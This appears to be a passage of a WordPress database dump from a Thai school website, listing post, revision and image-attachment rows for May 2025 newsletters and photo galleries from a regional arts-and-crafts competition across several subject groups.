(1201,1,'2025-05-14 21:26:41','2025-05-14 14:26:41','','2-68','','inherit','','closed','','2-68','','','2025-05-14 21:26:41','2025-05-14 14:26:41','',1200,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2-68.png',0,'attachment','image/png',0),
(1202,1,'2025-05-14 21:26:45','2025-05-14 14:26:45','','3-68','','inherit','','closed','','3-68','','','2025-05-14 21:26:45','2025-05-14 14:26:45','',1200,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/3-68.png',0,'attachment','image/png',0),
(1203,1,'2025-05-14 21:27:15','2025-05-14 14:27:15','','2-68','','inherit','','closed','','2-68-2','','','2025-05-14 21:27:15','2025-05-14 14:27:15','',1200,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2-68-1.png',0,'attachment','image/png',0),
(1204,1,'2025-05-14 21:27:49','2025-05-14 14:27:49','<!-- wp:image {\"id\":1203,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/2-68-1-724x1024.png\" alt=\"\" class=\"wp-image-1203\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์ ฉบับที่ 2 ปีที่ 3 ลงวันที่ 13 พฤษภาคม พ.ศ.2568','','inherit','closed','closed','','1200-revision-v1','','','2025-05-14 21:27:49','2025-05-14 14:27:49','',1200,'http://pakhaeng.ssk.in.th/?p=1204',0,'revision','',0),
(1205,1,'2025-05-14 21:28:33','2025-05-14 14:28:33','<!-- wp:image {\"id\":1202,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/3-68-724x1024.png\" alt=\"\" class=\"wp-image-1202\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์ ฉบับที่ 3 ปีที่ 3 ลงวันที่ 14 พฤษภาคม พ.ศ.2568','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-%e0%b8%89%e0%b8%9a-2','','','2025-05-14 21:29:12','2025-05-14 14:29:12','',0,'http://pakhaeng.ssk.in.th/?p=1205',0,'post','',0),
(1206,1,'2025-05-14 21:28:33','2025-05-14 14:28:33','<!-- wp:image {\"id\":1202,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/3-68-724x1024.png\" alt=\"\" class=\"wp-image-1202\"/></figure>\n<!-- /wp:image -->','วารสารประชาสัมพันธ์ ฉบับที่ 3 ปีที่ 3 ลงวันที่ 14 พฤษภาคม พ.ศ.2568','','inherit','closed','closed','','1205-revision-v1','','','2025-05-14 21:28:33','2025-05-14 14:28:33','',1205,'http://pakhaeng.ssk.in.th/?p=1206',0,'revision','',0),
(1208,1,'2025-05-15 09:43:41','2025-05-15 02:43:41','<!-- wp:paragraph -->\n<p>ปีการศึกษา 2567</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a><img height=\"16\" width=\"16\" alt=\"🩵\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t97/1/16/1fa75.png\">กลุ่มสาระการเรียนรู้คณิตศาสตร์<img height=\"16\" width=\"16\" alt=\"🩵\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t97/1/16/1fa75.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1209,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/494681839_122153069156511674_7948308233943019932_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1209\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1210,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495090140_122153069060511674_4169399057052512528_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-1210\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1213,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495194078_122153069252511674_3692708040108996_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1213\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1211,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495205254_122153069210511674_3914265977018363036_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1211\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1212,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495490841_122153069318511674_151330112056767455_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1212\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1214,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495937641_122153069102511674_5959480539774181867_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1214\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','การแข่งขันศิลปหัตถกรรมครั้งที่ 72 ระดับเขตพื้นที่การศึกษา กลุ่มสาระการเรียนรู้คณิตศาสตร์','','publish','closed','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%82%e0%b9%88%e0%b8%87%e0%b8%82%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b4%e0%b8%a5%e0%b8%9b%e0%b8%ab%e0%b8%b1%e0%b8%95%e0%b8%96%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1','','','2025-05-15 09:45:07','2025-05-15 02:45:07','',0,'http://pakhaeng.ssk.in.th/?p=1208',0,'post','',0),
(1209,1,'2025-05-15 09:41:56','2025-05-15 02:41:56','','494681839_122153069156511674_7948308233943019932_n','','inherit','','closed','','494681839_122153069156511674_7948308233943019932_n','','','2025-05-15 09:41:56','2025-05-15 02:41:56','',1208,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/494681839_122153069156511674_7948308233943019932_n.jpg',0,'attachment','image/jpeg',0),
(1210,1,'2025-05-15 09:41:56','2025-05-15 02:41:56','','495090140_122153069060511674_4169399057052512528_n (1)','','inherit','','closed','','495090140_122153069060511674_4169399057052512528_n-1','','','2025-05-15 09:41:56','2025-05-15 02:41:56','',1208,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495090140_122153069060511674_4169399057052512528_n-1.jpg',0,'attachment','image/jpeg',0),
(1211,1,'2025-05-15 09:41:56','2025-05-15 02:41:56','','495205254_122153069210511674_3914265977018363036_n','','inherit','','closed','','495205254_122153069210511674_3914265977018363036_n','','','2025-05-15 09:41:56','2025-05-15 02:41:56','',1208,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495205254_122153069210511674_3914265977018363036_n.jpg',0,'attachment','image/jpeg',0),
(1212,1,'2025-05-15 09:41:56','2025-05-15 02:41:56','','495490841_122153069318511674_151330112056767455_n','','inherit','','closed','','495490841_122153069318511674_151330112056767455_n','','','2025-05-15 09:41:56','2025-05-15 02:41:56','',1208,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495490841_122153069318511674_151330112056767455_n.jpg',0,'attachment','image/jpeg',0),
(1213,1,'2025-05-15 09:41:56','2025-05-15 02:41:56','','495194078_122153069252511674_3692708040108996_n','','inherit','','closed','','495194078_122153069252511674_3692708040108996_n','','','2025-05-15 09:41:56','2025-05-15 02:41:56','',1208,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495194078_122153069252511674_3692708040108996_n.jpg',0,'attachment','image/jpeg',0),
(1214,1,'2025-05-15 09:41:56','2025-05-15 02:41:56','','495937641_122153069102511674_5959480539774181867_n','','inherit','','closed','','495937641_122153069102511674_5959480539774181867_n','','','2025-05-15 09:41:56','2025-05-15 02:41:56','',1208,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495937641_122153069102511674_5959480539774181867_n.jpg',0,'attachment','image/jpeg',0),
(1215,1,'2025-05-15 09:43:41','2025-05-15 02:43:41','<!-- wp:paragraph -->\n<p>ปีการศึกษา 2567</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a><img height=\"16\" width=\"16\" alt=\"🩵\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t97/1/16/1fa75.png\">กลุ่มสาระการเรียนรู้คณิตศาสตร์<img height=\"16\" width=\"16\" alt=\"🩵\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t97/1/16/1fa75.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1209,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/494681839_122153069156511674_7948308233943019932_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1209\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1210,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495090140_122153069060511674_4169399057052512528_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-1210\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1213,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495194078_122153069252511674_3692708040108996_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1213\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1211,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495205254_122153069210511674_3914265977018363036_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1211\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1212,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495490841_122153069318511674_151330112056767455_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1212\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1214,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495937641_122153069102511674_5959480539774181867_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1214\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','การแข่งขันศิลปหัตถกรรมครั้งที่ 72 ระดับเขตพื้นที่การศึกษา','','inherit','closed','closed','','1208-revision-v1','','','2025-05-15 09:43:41','2025-05-15 02:43:41','',1208,'http://pakhaeng.ssk.in.th/?p=1215',0,'revision','',0),
(1216,1,'2025-05-15 09:45:06','2025-05-15 02:45:06','<!-- wp:paragraph -->\n<p>ปีการศึกษา 2567</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a><img height=\"16\" width=\"16\" alt=\"🩵\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t97/1/16/1fa75.png\">กลุ่มสาระการเรียนรู้คณิตศาสตร์<img height=\"16\" width=\"16\" alt=\"🩵\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t97/1/16/1fa75.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1209,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/494681839_122153069156511674_7948308233943019932_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1209\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1210,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495090140_122153069060511674_4169399057052512528_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-1210\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1213,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495194078_122153069252511674_3692708040108996_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1213\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1211,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495205254_122153069210511674_3914265977018363036_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1211\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1212,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495490841_122153069318511674_151330112056767455_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1212\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1214,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/495937641_122153069102511674_5959480539774181867_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1214\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','การแข่งขันศิลปหัตถกรรมครั้งที่ 72 ระดับเขตพื้นที่การศึกษา กลุ่มสาระการเรียนรู้คณิตศาสตร์','','inherit','closed','closed','','1208-revision-v1','','','2025-05-15 09:45:06','2025-05-15 02:45:06','',1208,'http://pakhaeng.ssk.in.th/?p=1216',0,'revision','',0),
(1217,1,'2025-05-15 09:48:25','2025-05-15 02:48:25','<!-- wp:paragraph -->\n<p>ปีการศึกษา 2567</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a><img height=\"16\" width=\"16\" alt=\"⚽️\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/taf/1/16/26bd.png\">กลุ่มสาระการเรียนรู้สุขศึกษาและพลศึกษา<img height=\"16\" width=\"16\" alt=\"⚽️\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/taf/1/16/26bd.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img height=\"16\" width=\"16\" alt=\"🧡\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tfd/1/16/1f9e1.png\">กลุ่มสาระการเรียนรู้สังคมศึกษา ศาสนา และวัฒนธรรม<img height=\"16\" width=\"16\" alt=\"🧡\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tfd/1/16/1f9e1.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img height=\"16\" width=\"16\" alt=\"👨‍🍳\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t74/1/16/1f468_200d_1f373.png\">กลุ่มสาระการเรียนรู้การงานอาชีพ<img height=\"16\" width=\"16\" alt=\"👩‍🍳\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t53/1/16/1f469_200d_1f373.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1219,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492395533_122151342884511674_5518396333285192230_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1219\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1218,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492478399_122151342728511674_1569254423643431118_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1218\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1221,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492575902_122151342824511674_3073344397673799104_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1221\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1220,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492867737_122151342668511674_2044248599372287971_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1220\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','การแข่งขันศิลปหัตถกรรมครั้งที่ 72 ระดับเขตพื้นที่การศึกษา กลุ่มสาระการเรียนรู้สุขศึกษาและพลศึกษา กลุ่มสาระการเรียนรู้สังคมศึกษา ศาสนา และวัฒนธรรม และกลุ่มสาระการเรียนรู้การงานอาชีพ','','publish','closed','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%82%e0%b9%88%e0%b8%87%e0%b8%82%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b4%e0%b8%a5%e0%b8%9b%e0%b8%ab%e0%b8%b1%e0%b8%95%e0%b8%96%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1-2','','','2025-05-15 09:48:26','2025-05-15 02:48:26','',0,'http://pakhaeng.ssk.in.th/?p=1217',0,'post','',0),
(1218,1,'2025-05-15 09:48:01','2025-05-15 02:48:01','','492478399_122151342728511674_1569254423643431118_n','','inherit','','closed','','492478399_122151342728511674_1569254423643431118_n','','','2025-05-15 09:48:01','2025-05-15 02:48:01','',1217,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492478399_122151342728511674_1569254423643431118_n.jpg',0,'attachment','image/jpeg',0),
(1219,1,'2025-05-15 09:48:01','2025-05-15 02:48:01','','492395533_122151342884511674_5518396333285192230_n','','inherit','','closed','','492395533_122151342884511674_5518396333285192230_n','','','2025-05-15 09:48:01','2025-05-15 02:48:01','',1217,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492395533_122151342884511674_5518396333285192230_n.jpg',0,'attachment','image/jpeg',0),
(1220,1,'2025-05-15 09:48:01','2025-05-15 02:48:01','','492867737_122151342668511674_2044248599372287971_n','','inherit','','closed','','492867737_122151342668511674_2044248599372287971_n','','','2025-05-15 09:48:01','2025-05-15 02:48:01','',1217,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492867737_122151342668511674_2044248599372287971_n.jpg',0,'attachment','image/jpeg',0),
(1221,1,'2025-05-15 09:48:01','2025-05-15 02:48:01','','492575902_122151342824511674_3073344397673799104_n','','inherit','','closed','','492575902_122151342824511674_3073344397673799104_n','','','2025-05-15 09:48:01','2025-05-15 02:48:01','',1217,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492575902_122151342824511674_3073344397673799104_n.jpg',0,'attachment','image/jpeg',0),
(1222,1,'2025-05-15 09:48:25','2025-05-15 02:48:25','<!-- wp:paragraph -->\n<p>ปีการศึกษา 2567</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a><img height=\"16\" width=\"16\" alt=\"⚽️\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/taf/1/16/26bd.png\">กลุ่มสาระการเรียนรู้สุขศึกษาและพลศึกษา<img height=\"16\" width=\"16\" alt=\"⚽️\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/taf/1/16/26bd.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img height=\"16\" width=\"16\" alt=\"🧡\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tfd/1/16/1f9e1.png\">กลุ่มสาระการเรียนรู้สังคมศึกษา ศาสนา และวัฒนธรรม<img height=\"16\" width=\"16\" alt=\"🧡\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tfd/1/16/1f9e1.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img height=\"16\" width=\"16\" alt=\"👨‍🍳\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t74/1/16/1f468_200d_1f373.png\">กลุ่มสาระการเรียนรู้การงานอาชีพ<img height=\"16\" width=\"16\" alt=\"👩‍🍳\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t53/1/16/1f469_200d_1f373.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1219,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492395533_122151342884511674_5518396333285192230_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1219\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1218,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492478399_122151342728511674_1569254423643431118_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1218\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1221,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492575902_122151342824511674_3073344397673799104_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1221\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1220,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492867737_122151342668511674_2044248599372287971_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1220\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','การแข่งขันศิลปหัตถกรรมครั้งที่ 72 ระดับเขตพื้นที่การศึกษา กลุ่มสาระการเรียนรู้สุขศึกษาและพลศึกษา กลุ่มสาระการเรียนรู้สังคมศึกษา ศาสนา และวัฒนธรรม และกลุ่มสาระการเรียนรู้การงานอาชีพ','','inherit','closed','closed','','1217-revision-v1','','','2025-05-15 09:48:25','2025-05-15 02:48:25','',1217,'http://pakhaeng.ssk.in.th/?p=1222',0,'revision','',0),
(1223,1,'2025-05-15 09:50:40','2025-05-15 02:50:40','<!-- wp:paragraph -->\n<p>ปีการศึกษา 2567</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a><img height=\"16\" width=\"16\" alt=\"🧑‍🔬\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tbb/1/16/1f9d1_200d_1f52c.png\">กลุ่มสาระการเรียนรู้ วิทยาศาสตร์และเทคโนโลยี<img height=\"16\" width=\"16\" alt=\"👩‍🔬\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tea/1/16/1f469_200d_1f52c.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img height=\"16\" width=\"16\" alt=\"💻\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t8c/1/16/1f4bb.png\">คอมพิวเตอร์<img height=\"16\" width=\"16\" alt=\"💻\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t8c/1/16/1f4bb.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img height=\"16\" width=\"16\" alt=\"✈️\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tb6/1/16/2708.png\">นักบินน้อย<img height=\"16\" width=\"16\" alt=\"✈️\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tb6/1/16/2708.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/491929256_122150985566511674_1213237821774674225_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1224\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1228,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492007580_122150985614511674_8101341862677661150_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1228\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1226,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492027961_122150985494511674_7229230026640867612_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1226\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1227,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492064201_122150985728511674_95307321235512140_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1227\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1225,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492153224_122150985776511674_8127100753024819994_n-1024x726.jpg\" alt=\"\" class=\"wp-image-1225\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','การแข่งขันศิลปหัตถกรรมครั้งที่ 72 ระดับเขตพื้นที่การศึกษา กลุ่มสาระการเรียนรู้ วิทยาศาสตร์และเทคโนโลยี คอมพิวเตอร์ และนักบินน้อย','','publish','closed','closed','','%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%81%e0%b8%82%e0%b9%88%e0%b8%87%e0%b8%82%e0%b8%b1%e0%b8%99%e0%b8%a8%e0%b8%b4%e0%b8%a5%e0%b8%9b%e0%b8%ab%e0%b8%b1%e0%b8%95%e0%b8%96%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1-3','','','2025-05-15 09:51:18','2025-05-15 02:51:18','',0,'http://pakhaeng.ssk.in.th/?p=1223',0,'post','',0),
(1224,1,'2025-05-15 09:50:26','2025-05-15 02:50:26','','491929256_122150985566511674_1213237821774674225_n','','inherit','','closed','','491929256_122150985566511674_1213237821774674225_n','','','2025-05-15 09:50:26','2025-05-15 02:50:26','',1223,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/491929256_122150985566511674_1213237821774674225_n.jpg',0,'attachment','image/jpeg',0),
(1225,1,'2025-05-15 09:50:26','2025-05-15 02:50:26','','492153224_122150985776511674_8127100753024819994_n','','inherit','','closed','','492153224_122150985776511674_8127100753024819994_n','','','2025-05-15 09:50:26','2025-05-15 02:50:26','',1223,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492153224_122150985776511674_8127100753024819994_n.jpg',0,'attachment','image/jpeg',0),
(1226,1,'2025-05-15 09:50:26','2025-05-15 02:50:26','','492027961_122150985494511674_7229230026640867612_n','','inherit','','closed','','492027961_122150985494511674_7229230026640867612_n','','','2025-05-15 09:50:26','2025-05-15 02:50:26','',1223,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/492027961_122150985494511674_7229230026640867612_n.jpg',0,'attachment','image/jpeg',0),
